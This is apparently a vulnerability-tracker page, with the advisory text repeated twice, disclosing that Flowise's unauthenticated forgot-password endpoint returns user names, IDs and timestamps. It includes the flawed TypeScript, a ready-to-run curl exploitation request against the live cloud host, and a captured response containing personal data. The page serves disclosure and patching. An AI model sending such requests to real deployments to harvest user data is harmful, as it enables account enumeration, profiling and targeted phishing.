Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
6.9
Flowise Exposes Sensitive User Info on Forgotten Password Request
GHSA-jc5m-wrp2-qq38
Summary
An attacker can see a user's name, email, and other details without logging in. This happens when trying to reset a password for any user with a known email address. Fix this by ensuring sensitive info is not returned in the response.
What to do
- Update flowise to version 3.0.13.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | flowise | <= 3.0.12 | 3.0.13 |
Original title
Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint
Original description
## Summary
The `/api/v1/account/forgot-password` endpoint returns the full user object including PII (id, name, email, status, timestamps) in the response body instead of a generic success message. This exposes sensitive user information to unauthenticated attackers who only need to know a valid email address.
## Vulnerability Details
| Field | Value |
|-------|-------|
| CWE | CWE-200: Exposure of Sensitive Information to an Unauthorized Actor |
| Affected File | `packages/server/src/enterprise/services/account.service.ts` (lines 517-545) |
| Endpoint | `POST /api/v1/account/forgot-password` |
| Authentication | None required |
| CVSS 3.1 | 3.7 (Low) |
## Root Cause
In `account.service.ts`, the `forgotPassword` method returns the sanitized user object instead of a simple success acknowledgment:
```typescript
public async forgotPassword(data: AccountDTO) {
// ...
const user = await this.userService.readUserByEmail(data.user.email, queryRunner)
if (!user) throw new InternalFlowiseError(StatusCodes.NOT_FOUND, UserErrorMessage.USER_NOT_FOUND)
data.user = user
// ... password reset logic ...
return sanitizeUser(data.user) // Returns user object with PII
}
```
The `sanitizeUser` function only removes sensitive authentication fields:
```typescript
export function sanitizeUser(user: Partial<User>) {
delete user.credential // password hash
delete user.tempToken // reset token
delete user.tokenExpiry
return user // Still contains: id, name, email, status, createdDate, updatedDate
}
```
## Impact
An unauthenticated attacker can:
1. **Harvest PII**: Collect user IDs, full names, and account metadata
2. **Profile users**: Determine account creation dates and activity patterns
3. **Enumerate accounts**: Confirm email existence and gather associated data
4. **Enable further attacks**: Use harvested data for social engineering or targeted phishing
## Exploitation
```bash
curl -X POST "https://cloud.flowiseai.com/api/v1/account/forgot-password" \
-H "Content-Type: application/json" \
-d '{"user":{"email":"[email protected]"}}'
```
### Evidence
**Request:**
```http
POST /api/v1/account/forgot-password HTTP/1.1
Host: cloud.flowiseai.com
Content-Type: application/json
{"user":{"email":"[email protected]"}}
```
**Response (201 Created):**
```json
{
"id": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12",
"name": "Vefag naprb",
"email": "[email protected]",
"status": "active",
"createdDate": "2026-01-17T15:21:59.152Z",
"updatedDate": "2026-01-17T15:35:06.492Z",
"createdBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12",
"updatedBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12"
}
```
<img width="1582" height="791" alt="screenshot" src="https://github.com/user-attachments/assets/9880f037-6e21-41d7-a7c8-7057c6775b50" />
## Exposed Data
| Field | Risk |
|-------|------|
| `id` | Internal user UUID - enables targeted attacks |
| `name` | Full name - PII disclosure |
| `email` | Email confirmation |
| `status` | Account state information |
| `createdDate` | User profiling |
| `updatedDate` | Activity tracking |
| `createdBy` / `updatedBy` | Internal reference leak |
## Expected Behavior
A secure forgot-password endpoint should return a generic response regardless of whether the email exists:
```json
{"message": "If this email exists, a password reset link has been sent."}
```
## References
- [CWE-200: Exposure of Sensitive Information](https://cwe.mitre.org/data/definitions/200.html)
- [OWASP Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#password-recovery)
The `/api/v1/account/forgot-password` endpoint returns the full user object including PII (id, name, email, status, timestamps) in the response body instead of a generic success message. This exposes sensitive user information to unauthenticated attackers who only need to know a valid email address.
## Vulnerability Details
| Field | Value |
|-------|-------|
| CWE | CWE-200: Exposure of Sensitive Information to an Unauthorized Actor |
| Affected File | `packages/server/src/enterprise/services/account.service.ts` (lines 517-545) |
| Endpoint | `POST /api/v1/account/forgot-password` |
| Authentication | None required |
| CVSS 3.1 | 3.7 (Low) |
## Root Cause
In `account.service.ts`, the `forgotPassword` method returns the sanitized user object instead of a simple success acknowledgment:
```typescript
public async forgotPassword(data: AccountDTO) {
// ...
const user = await this.userService.readUserByEmail(data.user.email, queryRunner)
if (!user) throw new InternalFlowiseError(StatusCodes.NOT_FOUND, UserErrorMessage.USER_NOT_FOUND)
data.user = user
// ... password reset logic ...
return sanitizeUser(data.user) // Returns user object with PII
}
```
The `sanitizeUser` function only removes sensitive authentication fields:
```typescript
export function sanitizeUser(user: Partial<User>) {
delete user.credential // password hash
delete user.tempToken // reset token
delete user.tokenExpiry
return user // Still contains: id, name, email, status, createdDate, updatedDate
}
```
## Impact
An unauthenticated attacker can:
1. **Harvest PII**: Collect user IDs, full names, and account metadata
2. **Profile users**: Determine account creation dates and activity patterns
3. **Enumerate accounts**: Confirm email existence and gather associated data
4. **Enable further attacks**: Use harvested data for social engineering or targeted phishing
## Exploitation
```bash
curl -X POST "https://cloud.flowiseai.com/api/v1/account/forgot-password" \
-H "Content-Type: application/json" \
-d '{"user":{"email":"[email protected]"}}'
```
### Evidence
**Request:**
```http
POST /api/v1/account/forgot-password HTTP/1.1
Host: cloud.flowiseai.com
Content-Type: application/json
{"user":{"email":"[email protected]"}}
```
**Response (201 Created):**
```json
{
"id": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12",
"name": "Vefag naprb",
"email": "[email protected]",
"status": "active",
"createdDate": "2026-01-17T15:21:59.152Z",
"updatedDate": "2026-01-17T15:35:06.492Z",
"createdBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12",
"updatedBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12"
}
```
<img width="1582" height="791" alt="screenshot" src="https://github.com/user-attachments/assets/9880f037-6e21-41d7-a7c8-7057c6775b50" />
## Exposed Data
| Field | Risk |
|-------|------|
| `id` | Internal user UUID - enables targeted attacks |
| `name` | Full name - PII disclosure |
| `email` | Email confirmation |
| `status` | Account state information |
| `createdDate` | User profiling |
| `updatedDate` | Activity tracking |
| `createdBy` / `updatedBy` | Internal reference leak |
## Expected Behavior
A secure forgot-password endpoint should return a generic response regardless of whether the email exists:
```json
{"message": "If this email exists, a password reset link has been sent."}
```
## References
- [CWE-200: Exposure of Sensitive Information](https://cwe.mitre.org/data/definitions/200.html)
- [OWASP Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#password-recovery)
ghsa CVSS4.0
6.9
Vulnerability type
CWE-200
Information Exposure
Published: 5 Mar 2026 · Updated: 7 Mar 2026 · First seen: 6 Mar 2026